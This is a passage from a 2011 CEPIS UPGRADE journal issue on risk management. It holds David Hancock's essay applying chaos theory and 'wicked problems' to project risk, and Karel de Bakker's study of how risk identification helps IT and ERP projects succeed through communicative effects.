small steps. Small steps are easier to conceptualise, plan
for and manage. They can be retraced more easily if they
haven’t delivered the required results or if it becomes clear
they are leading in the wrong direction. Small steps also
support the idea of fast learning loops. For instance, a
lengthy project phase reduces the opportunity to quickly
feedback lessons learned. If the project is too slow to respond, it may fail under the accumulated weight of uncertainty.
More iterative ways of working are becoming increasingly common and do much to increase the agility of a
project. A feature of monolithic projects (i.e. those which
do not follow an iterative strategy) is the assumption that
everything proceeds more or less as a sequence of tasks
executed on a ‘right first time’ basis. Generally speaking,
more effort is directed at protecting this assumption (for
example, by analysing and mitigating risks which may
threaten the task sequence) than on planning for a certain
level of rework. In contrast, by planning to tackle tasks iteratively, two benefits are gained: firstly, early sight of unfathomable issues which wouldn’t otherwise surface until
much later in the schedule, and secondly, greater opportunity to make controlled changes.
Finally, an agile project is continuously looking for ways
to improve. A project which is unable (or unwilling) to learn
lessons is destined to repeat its early mistakes because it
ignores opportunities to learn from the unexpected. Some
lessons are obvious, some require much soul-searching,
brainstorming or independent analysis. What matters above
all else is that the improvements are captured and disseminated and the changes implemented, either in the latter project
stages or in the next project the organisation undertakes.
It may be helpful to visualise the project as existing
in a continual state of dynamic tension
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© Novática
Risk Management
The application of the ‘New Sciences’
to Risk and Project Management1
David Hancock
The type of problems that need to be solved in organizations are very variable in terms of their complexity ranging from
‘tame’ problems to ‘wicked messes’. We state that projects tend to have the characteristics of wicked messes where decision making gets confused by behavioural and dynamic complexities which coexist and interact. To address the situation
we cannot continue to rely on sequential resolution processes, quantitative assessments and simple qualitative estimates.
We propose instead to develop the concept of risk leadership which is intended to capture the activities and knowledge
necessary for project managers to accommodate the disorder and unpredictability inherent in project environments through
flexible practices leading to negotiated solutions.
Keywords: Behavioural Complexities, Chaotic Systems, Dynamic Complexities, Quantitative Assessments,
Qualitative Estimates, Risk Leadership, Risk Management,
Scientific Management, Tame Problems, Wicked Problems.
"We’re better at predicting events at the edge of the galaxy or inside the nucleus of an atom than whether it’ll rain
on auntie’s garden party three Sundays from now. Because
the problem turns out to be different. We can’t even predict
the next drip from a dripping tap when it gets irregular. It’s
the best possible time to be alive, when almost everything
you thought you knew is wrong."
"Arcadia" by Tom Stoppard
Introduction
There is a feeling amongst some risk practitioners, myself included, that theoretical risk management has strayed
from our intuition of the world of project management. Historically, project risk management has developed from the
numerical disciplines dominated by a preoccupation with
statistics (Insurance, accountancy, engineering etc.) This has
led to a bias towards the numerical in the world of project
management.
In the 1950’s a new type of scientific management was
emerging, that of project management. This consisted of
the development of formal tools and techniques to help
manage large complex projects that were considered uncertain or risky. It was dominated by the construction and engineering industries with companies such as Du Pont developing Critical Path Analysis (CPA) and RAND Corp
developing Programme Evaluation and Review Technique
(PERT) techniques. Following on the heels of these early
project management techniques, institutions began to be
1
This article was previously published online in the "Advances in
Project Management" column of PM World Today (Vol. XII Issue V
- May 2010), <http://www.pmworldtoday.net/>. It is republished with
all permissions.
© Novática
Farewell Edition
Author
David Hancock is Head of Project Risk for London
Underground part of Transport for London, United Kingdom.
He has run his own consultancy, and was Director of Risk and
Assurance for the London Development Agency (LDA) under
both Ken Livingstone and Boris Johnson’s leadership with
responsibilities for risk management activities including health
& safety, business continuity and audit for all of the Agency’s
and its partner’s programmes. Prior to this role, for 6 years he
was Executive Resources Director with the Halcrow Group,
responsible for the establishing and expanding the business
consultancy group. He has a wide breadth of knowledge in
project management and complex projects and extensive
experience in opportunity & risk management, with special
regard to the people & behavioural aspects. He is presently a
board director with ALARM (The National Forum for Risk
Management in the Public Sector), a co-director of the managing
partners’ forum risk panel, member of the programme committee
for the Major Projects Association and a visiting Fellow at
Cranfield University, United Kingdom, in their School of
Management. <[email protected]>
formed in the 1970’s as repositories for these developing
methodologies. In 1969 the American Project Management
Institute (PMI) was founded; in 2009 the organization has
more than 420,000 members, with 250 chapters in more
than 171 countries. It was followed in 1975 by the UK Association of Project Managers (changed to Association for
Project Management in 1999) with its own set of methodologies. In order to explicitly capture and codify the processes by which they believed projects should be managed,
they developed qualifications and guidelines to support
them. However, whilst the worlds of physics, mathematics,
economics and science have moved on beyond Newtonian
methods to a more behavioural understanding, the so called
new sciences, led by eminent scholars in the field such as
Einstein, Lorenz and Feynman. Project and risk management appears largely to have remained stuck to the principles of the 1950’s.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
55
Risk Management
Box 1: The Butterfly Effect
In 1961 whilst working on long range weather prediction, Edward Lorenz made a startling
discovery. Whilst working on a particular weather run rather than starting the second run from
the beginning he started it part way through using the figures from the first run. This should have
produced an identical run but he found that it started to diverge rapidly until after a few months it
bore no resemblance to the first run. At first he thought he had entered the numbers in error.
However this turned out to be far from the case, what he had actually done was round the figures
and instead of using the output of 6 decimal places had used only three (.506 instead of .506127).
The difference one part in a thousand he had considered inconsequential especially as a weather
satellite being able to read to this level of accuracy is considered quite unusual. This slight
difference had caused a massive difference in the resulting end point. This gave rise to the idea
that a butterfly could produce small undetectable changes in pressure which would considered in
the model and this difference could result in altering the path, delaying or stopping of a tornado
over time.
Edward N Lorenz . 1972 Predictability: Does the Flap of a Butterfly's Wings in Brazil Set Off a
Tornado in Texas?
Figure: Two pendulums with an initial starting difference of only 1 arcsec (1/3600 of a
degree).
Table 1: The implications of the New Concept of Risk Leadership.
Risk Management
The general perception amongst most project and risk
managers that we can somehow control the future is, in my
opinion, one of the most ill-conceived in risk management.
However, we have made at least two advances in the right
direction. Firstly, we now have a better understanding about
the likelihood of unpleasant surprises and, more importantly,
we are learning how to recognise their occurrence early on
and subsequently to manage the consequences when they
do occur.
Qualitative and Quantitative Risk
The biggest problem facing us is how to measure all
these risks in terms of their potential likelihood, their possible consequences, their correlation and the public’s perception of them. Most organisations measure different risks
using different tools. They use engineering estimates for
property exposures, leading to MFLs (maximum foreseeable loss) and PMLs (probable maximum loss). Actuarial
projections are employed for expected loss levels where
sufficient loss data is available. Scenario analyses and
“
The type of problems that need to be solved in organizations
are very variable in terms of their complexity ranging from
‘tame’ problems to ‘wicked messes’
56
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
Farewell Edition
© Novática
Risk Management
“
To address the situation we cannot continue to rely
on sequential resolution processes, quantitative assessments
and simple qualitative estimates
”
Monte Carlo simulations are used when data is thin, especially to answer how much should I apply questions.
Probabilistic and quantitative risk assessments are used for
toxicity estimates for drugs and chemicals, and to support
public policy decisions. For political risks, managers rely
on qualitative analyses of ‘experts’. When it comes to financial risks (credit, currency, interest rate and market), we
are inundated with Greek letters (betas, thetas, and so on)
and complex econometric models that are comprehensible
only to the trained and initiated. The quantitative tools are
often too abstract for laymen, whereas the qualitative tools lack
mathematical rigour. Organisations need a combination of both
tools, so that they can deliver sensible and practical assessments of their risks to their stakeholders. Finally it is important
to remember that the result of quantitative risk assessment development should be continuously checked against one’s own
intuition about what constitutes reasonable qualitative behaviour. When such a check reveals disagreement, then the following possibilities must be considered:
1. A mistake has been made in the formal mathematical development;
2. The starting assumptions are incorrect and/or constitute too drastic oversimplification;
3. One’s own intuition about the field is inadequately
developed;
4. A penetrating new principle has been discovered.
Tame Messes and Wicked Problems
One of the first areas to be investigated is whether our current single classification of projects is a correct assumption.
The general view at present appears to treat them as linear,
deterministic predictable systems, where a complex system or
problem can be reduced into simple forms for the purpose of
analysis. It is then believed that the analysis of those individual
parts will give an accurate insight into the working of the whole
system. The strongly held feeling that science will explain everything. The use of Gant charts with their critical paths and
quantitative risk models with their corresponding risk correlations would support this view. However this type of problem
which can be termed tame appears to be the only part of the
story when it comes to defining our projects.
“
Tame problems are problems which have straight-forward simple linear causal relationships and can be solved
by analytical methods, sometimes called the cascade or
waterfall method. Here lessons can be learnt from past
events and behaviours and applied to future problems, so
that best practices and procedures can be identified. In contrast ‘messes’ have high levels of system complexity and
are clusters of interrelated or interdependent problems. Here
the elements of the system are normally simple, where the
complexity lies in the nature of the interaction of its elements. The principle characteristic of which is that they cannot be solved in isolation but need to be considered holistically.
Here the solutions lie in the realm of systems thinking. Project
management has introduced the concepts of Programme and
Portfolio management to attempt to deal with this type of complexity and address the issues of interdependencies. Using strategies for dealing with messes is fine as long as most of us
share an overriding social theory or social ethic; if we don’t
we face ‘wickedness’. Wicked problems are termed as ‘divergent’, as opposed to ‘convergent’ problems. Wicked
problems are characterised by high levels of behavioural
complexity. What confuses real decision-making is that behavioural and dynamic complexities co-exist and interact
in what we call wicked messes. Dynamic complexity requires high level conceptual and systems thinking skills;
behavioural complexity requires high levels of relationship
and facilitative skills. The fact that problems cannot be
solved in isolation from one another makes it even more
difficult to deal with people’s differing assumptions and
values; people who think differently must learn about and
create a common reality, one which none of them initially
understands adequately. The main thrust to the resolution
of these types of problems is stakeholder participation and
‘satisficing’. Many risk planning and forecasting exercises
are still being undertaken on the basis of tame problems
that assume the variables on which they are based are few,
that they are fully understood and able to be controlled.
However uncertainties in the economy, politics and society
have become so great as to render counterproductive, if not
futile, this kind of risk management that many projects and
organisations still practise.
We propose instead to develop the concept
of risk leadership which is intended to capture
the required activities and knowledge
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
57
Risk Management
“
Project managers
must accommodate
the disorder
and unpredictability inherent
in project environments
through flexible practices
leading to negotiated
solutions
”
Chaos and Projects
At best I believe projects should be considered as deterministic chaotic systems rather than tame problems. Here I
am not using the term Chaos as defined in the English language which tends to be associated with absolute randomness and anarchy (Oxford English Dictionary describes
chaos as "complete disorder and confusion") but based on
the Chaos theory developed in the 1960’s. This theory
showed that systems which have a degree of feedback incorporated in them, that tiny differences in input could produce overwhelming differences in output. (The so called
Butterfly effect see Box 1[1]). Here chaos is defined as aperiodic (never repeating twice) banded dynamics (a finite
range) of a deterministic system (definite rules) that is sensitive on initial conditions. This appears to describe projects
much better than the linear deterministic and predictable
view. In which both randomness and order could exist simultaneously within those systems. The characteristics of
these types of problem are that they are not held in equilibrium either amongst its parts or with its environment but are
far from being held in equilibrium and the system operates
‘at the edge of chaos’ where small changes in input can cause
the project to either settle into a pattern or just as easily veer
into total discord. For those who are sceptical consider the
failing project that receives new leadership it can just as
easily move into abject failure as settle into successful delivery and at the outset we cannot predict with any certainty
which one will prevail. At worst they are wicked messes.
„
„
„
Guiding rather than prescribing
Adapting rather than formalising
Learning to live with complexity rather than simpli-
fying
„
„
„
Inclusion rather than exclusion
Leading rather than managing
The implications of the new concept of risk leadership are described in Table 1.
What does this all mean? At the least it means we must
apply a new approach for project and risk management for
problems which are not tame. That we should look to enhance our understanding of the behavioural aspects of the
profession and move away from a blind application of process and generic standards towards an informed implementation of guidance. That project and risk management is
more of an art than a science and that this truly is the best
time to be alive and being in project and risk management.
References
[1] J. Gleick. Chaos: Making A New Science. Penguin,
1987.
Conclusion
How should the project and risk professional exist in
this world of future uncertainly? Not by returning to a reliance on quantitative assessments and statistics where none
exists. We need to embrace its complexities and understand
the type of problem we face before deploying our armoury
of tools and techniques to uncover a solution, be they the
application of quantitative data or qualitative estimates. To
address risk in the future tense we need to develop the concept of ‘risk leadership’ which consists of:
58
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Communicative Project Risk Management in IT Projects
Karel de Bakker
Project management practitioners and scientists assume that risk management contributes to project success through
better planning of time, money and requirements. However, current literature on the relation between risk management
and IT project success provides hardly any evidence for this assumption. Nevertheless, risk management is used frequently
on IT projects. Findings from new research provide evidence that individual risk management activities are able to contribute to project success through "communicative effects". Risk management triggers or stimulates action taking, it
influences and synchronizes stakeholders’ perceptions and expectations and it shapes inter-stakeholder relationships.
These effects contribute to the success of the project.
Keywords: Case Studies, Communicative Action, ERP,
Experiment, Project Risk Management, Project Success.
1 Introduction
The question as to whether project risk management
contributes to project success is, in the context of project
management practitioners, essentially a question about the
value of an instrument. An instrument that is employed by
project managers during the planning and execution stages
of a project, employed to secure project success, regardless
of all manner of unexpected events and situations that may
occur during project execution.
In order to answer the question, a research project [1]
was conducted which was divided into four stages. The structure of this article embodies this staged approach, the first
stage being a study of recent literature on the relationship
between risk management and Information Technology (IT)
project success. IT projects are well known for their frequent failure (see e.g. [2]), and because of the recommendation to use risk management more frequently in order to
increase the success rate ([3]).
From the literature study it appeared that in order to answer the question about the contribution of project risk management to IT project success, an additional view on project
risk management and project success is necessary. This additional view is developed in the second stage of the research. Exploration of the additional view is done in the
third stage, by means of case studies of ERP implementation projects. Finally, in stage four, an experiment is conducted in which the influence of a single risk management
activity on project success is investigated. This article concludes with a section on theoretical implications and implications for practitioners.
2 What does Literature tell us about Risk Management and IT Project Success?
The conducted literature study investigated 29 papers,
published between 1997 and 2009 in scientific journals, reporting on the relationship between risk management and
project success in IT projects. The study demonstrates two
main approaches on how risk management is defined in the
© Novática
Farewell Edition
Author
Karel de Bakker is a Senior Consultant for Het Expertise
Centrum, The Netherlands. He received his PhD from the
University of Groningen, The Netherlands (2011), and his
Masters’ degree from the University of Enschede, The
Netherlands (1989). Hel has been a PMI certified project manager (PMP) since 2004. His assignments brought him in contact
with various organisations, including ABN AMRO Bank, ING
Bank, KLPD (Netherlands Police Agency), KPN Telecom, and
NS (Dutch Railways). Over the years, risk management became
an important element in his assignments. His scientific work on
the relation between risk management and project success was
published in International Journal of Project Management,
Project Management Journal and International Journal of Project
Organisation and Management. <[email protected]>
literature, one of them being the management approach.
The management approach considers risk management as
being an example of a rational problem solving process in
which risks are identified, analysed, and responses are developed and implemented. Evidence found in all investigated papers for the relationship between risk management
and project success is primarily anecdotal or not presented
at all.
Additional empirical findings indicate that the assumptions underpinning the management approach to risk management are often invalid. Firstly, IT projects contain risks
for which there is no classical or statistical probability distribution available. These risks cannot be managed by means
of the risk management process [4]. Secondly, project managers in IT projects show a tendency to deny the actual
“
Project management
practitioners and scientists
assume that risk management
contributes to project success
”
CEPIS UPGRADE Vol. XII, No. 5, December 2011
59
Risk Management
influence
PROJECT
Risk management
Instrumental
action
Instrumental
effect
Instrumental
object
Figure 1: Traditional View on Risk Management and its Relation to the Project.
presence of risk; they avoid it, ignore it or delay their actions [5]. This behaviour is not in line with the assumed
rational behaviour of actors. Thirdly, project stakeholders
in general deliberately overestimate the benefits of the
project and at the same time they underestimate the project
risks at the start of the project [6]). Finally, various authors
(e.g. [7]) indicate that the complete sequence of risk management activities is often not followed in projects, consequently the assumption of rational problem solving is incorrect.
Not only is there very little evidence from recent literature that risk management contributes to IT project success,
empirical findings thus far indicate it is also unlikely that
risk management is able to contribute to IT project success.
Taking into consideration the remarks made by various authors about the limitations of IT projects, risk management
is able to contribute to IT project success if the project: (1)
has clear and fixed requirements, (2) uses a strict method of
system development, and (3) has historical and applicable
data available, collected from previous projects. The combination of the three mentioned criteria will only occasionally be met in IT projects. As an example we can consider
the development of a software module of known functionality and function points by a software development organisation, certified on CMM level 4 or 5.
It remains remarkable that there is such a large gap between project risk management in theory and project risk
management in practice. Findings from research indicate
that the complete risk management process as described for
instance in the PMI Body of Knowledge [8], is often not
followed [9], or even that practitioners do not see the value
of executing particular steps of the risk management process [7]. In addition, it is remarkable that both project management Bodies of Knowledge and established current lit-
erature ignore the results from research which indicate the
assumptions and mechanisms that underpin project risk
management only work in specific situations, or do not work
at all. This should at least lead to a discussion about the
validity of certain elements of the Bodies of Knowledge,
and to the adjustment of the project risk management process, which is claimed to be founded on good practice [8] or
even Best Practice [10].
3 An Additional View to Project Risk Management
An important assumption in the current literature underpinning both project management and the way risk management influences the project and consequently project
success, is the assumption that projects are taking place in a
reality that is known, and that reality is responding according to the laws of nature the project stakeholders either know
or may be able to know (see e.g. [11]). This so called
instrumentalism assumption defines project risk management, its effects, and the object on which project risk management works, i.e. the project, in instrumental terms. Figure 1 depicts the relation between risk management and the
project in traditional terms, in other words under the assumption of instrumentalism.
Risk management may work well in situations in which
the object of risk management can be described in terms of
predictable behaviour (the instrumental context), for instance
controlling an airplane or a nuclear power plant, or a piece
of well defined software that must be created as part of an
IT project. Risk management is then an analytical process
in which information is collected and analysed on events
that may negatively influence the behaviour of the object
of risk management. However, projects, and particularly IT
projects, generally consist of a combination of elements that
contain both predictable and human behaviour; the latter of
influence
Risk management
Social
action
PROJECT
Instrumental and
additional
effects
Social
object
Figure 2: Adjusted (or New) View on Risk Management and its Relation to the Project.
60
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Risk Management
Activities, e.g.:
Identification
Communicative
effects
Success of the
project
(an individual
stakeholder
opinion)
Registration
Analysis
Allocation
Instrumental
effects
Reporting
Figure 3: Communicative and Instrumental Effects of Risk Management on Project Success.
which is not always predictable. The presence of human
behaviour makes a project a social object, an object which
does not behave completely predictably.
Furthermore, human behaviour, together with human
interaction, plays a role in the risk management process itself. During the various activities of the risk management
process, participants in these activities interact with each
other. Risk management can then no longer be considered
instrumental action, but should be considered social action
instead. These interactions between participants in the risk
management process may be able to create effects in addition to the assumed instrumental effects of risk management.
Figure 2 presents this adjusted view on the relationship between risk management and the project.
This adjusted view, which considers risk management
as being social action working on a social object, instead of
instrumental action working on an instrumental object, leads
to various changes in model definitions and assumptions
compared to the traditional view.
The adjusted view considers project success to be the
result of a personal evaluation of project outcome characteristics by each stakeholder individually (see e.g. [12]).
Timely delivery, delivery within budget limits and delivery
according to requirements, being the traditional objective
“
project success criteria, may play an important role in this
stakeholder evaluation process, but they are no longer the
only outcomes that together determine if the project can be
considered a success. Therefore, project success becomes
opinionated project success, and is no longer considered as
something that can be determined and measured only in
objective terms.
The adjusted view, considering risk management in
terms of social action, implies that risk management is a
process in which participants interact with each other. In
addition to the traditional view, which considers risk management only in terms of instrumental action and instrumental effects, the additional view assumes that interaction
between participants or social interaction exists, which may
lead to additional effects on the project and its success (see
Figure 3). This research refers to these effects resulting from
interaction as “communicative effects”, and the research
assumes that each risk management activity individually
may be able to generate communicative effects and may
therefore individually contribute to project success.
Generally speaking, this additional view on risk management creates an environment in which human behaviour and perception play central roles in terms of describing the effect of risk management and the success of the
New research provides evidence that individual risk
management activities are able to contribute to project
success through ‘communicative effects’
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
61
Risk Management
Case
1
Sector
Food industry
Project
SAP system implemented on two geographic locations in four organisational units.
description
System used to support a number of different food production processes and financial
activities.
Duration
13 months
Additional
Use of method for organisational change, not for project management. Time & Material
information
project contract. External project manager, hired by the customer, and not related to
the IT supplier.
Case
2
Sector
Government
Project
SAP system implemented on 40 locations. System used for production, issuing and
description
administration of personalized cards that provide access to office buildings. SAP linked
on all 40 locations to peripheral equipment (photo equipment, card printers)
Duration
17 months
Additional
Internal project with internal project manager. Limited number of external personnel.
information
No formal project contract. Limited Prince2 methodological approach, combined with
organization specific procedures and templates.
Case
3
Sector
Government
Project
SAP system implemented on four locations. System used for scheduling duty rosters of
description
around 3000 employees. Time critical project because of expiring licences of previous
scheduling system.
Duration
24 months (including feasibility study), 21 months excl.
Additional
Internal project with internal project manager. Limited number of external personnel.
information
No formal project contract. Limited Prince2 methodological approach, combined with
organization specific procedures and templates.
Case
4
Sector
Energy
Project
Creation from scratch of a new company, being part of a larger company. SAP
description
designed and implemented to support all business processes of the new company. SAP
system with high level of customization.
Duration
9 months (for stage 1; time according to original plan, but with scope limited)
Additional
The ERP project was part of a much larger project. Fixed price, fixed time, fixed scope
information
contract with financial incentives. Project manager from IT Supplier. Project restarted
and re-scoped after failure of first attempt. Strict use of (internal) project management
methodology, procedures and templates
Case
5
Project
ERP system based on Microsoft Dynamics Navision. Implemented to support various
Sector
Public utility (social housing)
description
primary business processes, for instance: customer contact, contract administration,
property maintenance
Duration
12 months
Additional
Time and material contract. Project restart after failure of first attempt. Project manager
information
from IT supplier organization. Limited Prince2 methodological approach.
Table 1A: Overview of Seven investigated ERP Implementation Projects.
62
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
© Novática
Risk Management
Case
6
Sector
Public utility (social housing)
Project
ERP system based on Microsoft Dynamics Navision. Implemented to support various
description
primary business processes, for instance: customer contact, contract administration,
Duration
11 months
Additional
Time and material contract. External project manager, hired by the customer
information
organization and with no formal relation to the IT Supplier. No formal project
management methodology used
Case
7
Sector
Petro-chemical industry
Project
Divestment project. Selling all activities of one specific country to a new owner. Existing
description
ERP systems related to the sold activities carved out of the company wide ERP system
(mainly SAP) and handed over to the new owner.
Duration
14 months (ready for hand-over as planned)
Additional
The ERP project was part of a larger project. The ERP project budget was low (less than
information
5%) compared to the overall deal (approx. 400 million EUR). Internal project manager.
Fixed time project, but delayed several times because of external factors. Internal
project management guidelines and templates used
Table 1B: Overview of Seven investigated ERP Implementation Projects.
project. The additional view acknowledges the influence of
stakeholders interacting with each other, and influencing
each other through communication. By doing so, this additional view positions itself outside the strict instrumental or
“traditional” project management approach that can be found
in project management Bodies of Knowledge. However, the
additional view does not deny the fact that risk management may influence project success in an instrumental
way; it only states that in addition to the potential instrumental effect of risk management, there is a communicative effect. Given the limitations of the effectiveness of
the instrumental effect, the influence of the communicative effect of risk management on project success may
probably be larger than the influence of the instrumental
effect.
4 Results from Case Studies
Seven ERP implementation projects were investigated
for the presence of communicative effects as a result of the
project risk management process. Presented here is a table
(Table 1) with an overview of all investigated ERP implementation projects. A total number of 19 stakeholders from
the various projects were interviewed. Data collection took place
between one and two months after project completion.
“
IT projects are well known
for their frequent failure
© Novática
”
Farewell Edition
Considering project success, two projects score low on
objective project success because of serious issues with
time, budget and requirements; both projects had a restart.
Four projects score medium on objective project success,
all having minor issues with one or more of the objective
success criteria. One project scores high on objective project
success. Variation on opinionated project success is low.
Stakeholders from the two low objective success projects
score lower on opinionated project success than
stakeholders from the other five projects, but based on the
objective success scores, the difference is less than expected.
ERP implementation projects that participated in the research were selected based on the criterion that they had
done “something” on risk management. The sample of
projects therefore does not include projects that performed
no risk management at all. Risk identification is conducted
on all projects, in various formats including brainstorm sessions, moderated sessions and expert sessions. Risk analysis was carried out in five projects, but only in a rather basic way; none of the projects used techniques for quantitative risk analysis. Other risk management activities, the use
of which were investigated in the projects are: the planning
of the risk management process, the registration of risks,
the allocation of risks to groups or individuals, the report-
1
This typology of effects is based on The Theory of Communicative Action by Jürgen Habermas (1984) [13]. In order to avoid an
excessively wide scope for this article, this theoretical background
is not discussed here.
CEPIS UPGRADE Vol. XII, No. 5, December 2011
63
Risk Management
“
Risks in IT projects
cannot be managed
by means of the risk
management process
”
ing of risks to stakeholders or stakeholder groups and the
control of risks. Actual use and format of these practices
vary over the projects.
The case studies’ results demonstrate that, according to
stakeholders, project risk management activities contribute
to the perceived success of the project. Risk identification
is, by all stakeholders, considered to be the risk management activity that contributes most to project success. Furthermore, stakeholders provide a large number of indications on how risk identification, in their view, contributes
to project success. Finally, risk identification is, by
stakeholders, considered to be able to contribute to project
success through a number of different effects; Action, Perception, Expectation and Relation effects1 .
Risk identification triggers, initiates or stimulates action taking or making actions more effective (Action effect). It influences the perception of an individual
stakeholder and synchronizes various stakeholders’ perceptions (Perception effect). It influences the expectations of
stakeholders towards the final project result or the expectations on stakeholder behaviour during project execution
(Expectation effect). Finally, it contributes to the process of
building and maintaining a work and interpersonal relationship between project stakeholders (Relation effect). Risk
reporting is another risk management activity that influences
project success through these four effects. Other risk management activities also generate effects, but less than the
four effects mentioned with risk identification and reporting. The research data demonstrate a positive relation (both
in quantity and in quality) between the effects generated
through risk management activities and project success.
5 Results from an Experiment
The conclusion that individual risk management activities contribute to project success is based upon the opinions
of individual stakeholders, meaning that the effect of risk
management on project success is directly attributable to
those effects as perceived by project stakeholders. Given
the case study research setting, the possibilities for “objective” validation of these perceptions are limited. In order to
create additional information on the effect of a specific risk
management practice on project success, independently of
various stakeholders’ perceptions, an experiment was developed with the aim to answer to the following sub-question: Does the use of a specific risk management practice
influence objective project success and project success as
perceived by project members?
Building on the results of the case studies, risk identification was chosen as the risk management activity for the
experiment. Risk identification is the activity which, according to the results from the case studies, has the most impact
on project success. Furthermore, a project generally starts
with a risk identification session, which makes risk identification relatively easy to implement in an experimental setting. The experiment was conducted with 212 participants
in 53 project groups. All participants were members of a
project group where, in the project, each member had the
same role. The project team had a common goal, which further diminished the chances for strategic behaviour of participants. The common goal situation provided the conditions for open communication and therefore for communicative effects, generated by the risk management activity.
All project groups that performed risk identification before project execution used a risk prompt list to support the
risk identification process. 17 groups did risk identification
by discussing the risks with team members (type 3 groups);
18 groups that did risk identification did not discuss risks
with team members (type 2 groups). The control group
projects (type 1 groups, 18 groups) conducted no risk identification at all before project execution. All project groups
had to execute the same project, consisting of 20 tasks.
Results from the experiment demonstrate that project
groups that conducted risk identification plus discussion
“
Human behaviour, together
with human interaction, plays
a role in the risk management
process itself
Figure 4: Trend Line, demonstrating the Influence of Risk
Identification (RI) with or without Group Discussion on the
Number of correctly Performed Tasks.
64
CEPIS UPGRADE Vol. XII, No. 5, December 2011
”
2
Jonckheere-Terpstra test: (J = 625, r = .36, p < .01, N = 53).
Farewell Edition
© Novática
Risk Management
“
The case studies’ results demonstrate that, according
to stakeholders, project risk management activities contribute
to the perceived success of the project
”
perform significantly better in the number of correctly completed tasks than the control groups that did not conduct
risk identification at all. The number of correctly performed
tasks is, in this experiment, one of the indicators for objective project success. A trend test2 demonstrates a highly significant result, indicating that the number of correctly performed tasks increases when groups perform risk identification, but increases further when groups do risk identification plus discussion. Figure 4 illustrates this trend. Types of
projects are on the X-axis. The Y-axis presents the average
number of correctly performed tasks by the project team
(Q3).
Perceived (opinionated) project success was measured
by asking projects to grade the project result. The analysis
of grades demonstrates some remarkable research findings.
Project groups that did risk identification plus discussion
(type 3) score significantly better on the number of correctly
performed tasks than control groups (type 1). After project
groups have been informed about their own project result
(and their own result only), all project groups value their
project result equally. There is no difference in grades assigned by project groups from any of the group types. The
result of project groups that conducted risk identification
plus discussion is objectively better, but apparently this better result is not reflected in the opinion of the project groups
who conducted risk identification plus discussion.
It is remarkable to see that, directly after project execution, before project groups are informed about their project
result, project groups who conducted risk identification plus
discussion are significantly more positive about their result
than groups that conducted no risk identification or risk identification without communication. The grades for project
success given by project groups directly after project execution indicate that project groups attribute positive effects
to risk management in relation to project success.
6 Conclusions and Implications
The main conclusion of this research is: Project risk
management as described in handbooks for project management and project risk management [14][8] only occasionally contributes to project success if project risk management is considered solely in terms of instrumental action working on an instrumental object. If, on the other hand,
project risk management is considered a set of activities in
“
which actors interact and exchange information, also known
as communicative action, working on a social object, individual risk management activities contribute to project success because the activities may generate Action, Perception, Expectation and Relation effects. A positive relation
exists between the effects generated through risk management activities and project success.
The experiment demonstrates that an individual risk
management activity is able to contribute to elements of
project success. For this effect to occur, it is not necessary
to measure or to quantify the risk. For instance in a risk
identification brainstorm, project stakeholders exchange
information on what they individually see as the potential
dangers for the project. Such an exchange of information
may lead to adjustments of the expectations of individual
actors and the creation of mindfulness [15]. Mindfulness
includes awareness and attention; actors become sensitive
to what is happening around them, and they know when
and how to act in case of problems. This leads to a remarkable conclusion, which can be described as “the quantum
effect” of project risk management, because its appearance
is somewhat similar to what Werner Heisenberg in quantum mechanics described as the uncertainty principle.
Firstly; in order to influence the risk, it is not necessary
to measure the risk. The experiment demonstrated that a
risk prompt list, in which five risks were mentioned that
were realistic, but all of which had very low probability of
occurring, is enough to make project members aware of
potential project risks and to influence their behaviour. As
a result, the project groups who talked about the risks before project execution performed better and gave themselves
a higher grade for the performance of their project. Secondly, as a result of this communicative effect, it is impossible to measure risk without changing its probability. The
moment the risk is discussed, stakeholders become influenced and this consequently leads to an effect on the probability of the risk.
Based on the research findings the main implication or
recommendation for practitioners is to continue the use of
risk management on IT projects. However, this research
provides some important recommendations that should be
taken into account when risk management is used on IT
projects. Practitioners should be aware that the assumptions
underlying the project risk management process as de-
The main implication or recommendation for practitioners is
to continue the use of risk management on IT projects
© Novática
”
Farewell Edition
CEPIS UPGRADE Vol. XII, No. 5, December 2011
65
Risk Management
scribed in handbooks for project management (the instrumental view) are often not correct. Hence, only in specific
situations, is the risk management process is able to contribute to project success in terms of “on-time, on-budget”
delivery of a predefined IT system. If project risk management is used in a situation in which the assumptions are not
met, it will inevitably lead to a situation in which project
stakeholders think that the project risks are under control,
where in fact they are not.
However, individual risk management activities such as
risk identification or risk allocation generate non-instrumental effects, possibly in addition to instrumental effects. These
non-instrumental or communicative effects occur as a result of interaction (discussion, exchange of information)
between project stakeholders during the execution of risk
management activities. Communicative effects stimulate
instrumental action taking by stakeholders, and the effects
create a common view among project stakeholders about
the project situation by influencing stakeholders’ perceptions and expectations and shaping the inter-stakeholders’
relationships. Practitioners should be aware that the creation of communicative effects can be stimulated by providing capacity for interaction during risk management activities. For instance; a risk identification brainstorm session
or moderated meeting will generate more communicative
effects than a risk identification session in which only checklists or questionnaires are used. For the communicative effects to occur it is not necessary that the complete risk management process is executed as described in handbooks for
project management. Individual risk management activities
each have their own effect on project success through the
various communicative effects they may generate. The communicative effect contributes to project success, not only in
terms of time, budget and quality, but also in terms of perceived success.
At the same time, practitioners should be aware that communicative effects with an effect on project success will
not occur in every project situation, nor that the effect is, in
all situations, a positive effect. If, for instance during risk
identification, certain information about risks is labelled as
being important for the project, where in fact these risks
were relevant in an earlier project, but not in the forthcoming project, the risk communication can lead to project members to focus upon (what later will appear to be) the “wrong
risks”. By focussing upon the wrong risks, project members are unable to detect and respond to risks that have not
been identified; one of the cases (case 7) of this research
provides an example of this type of problem. Furthermore,
communicative effects with a positive effect on project success occur predominantly in situations where information
is not used strategically. In situations in which information
on risks is not shared openly, the positive communicative
effect may not occur. One other case (case 4) of this research provides some indications that not sharing risk related information between customer and IT supplier leads
to lower communicative effects, resulting in lower project
success.
66
CEPIS UPGRADE Vol. XII, No. 5, December 2011
References
[1] K. de Bakker. Dialogue on Risk – Effects of Project
Risk Management on Project Success (diss.).
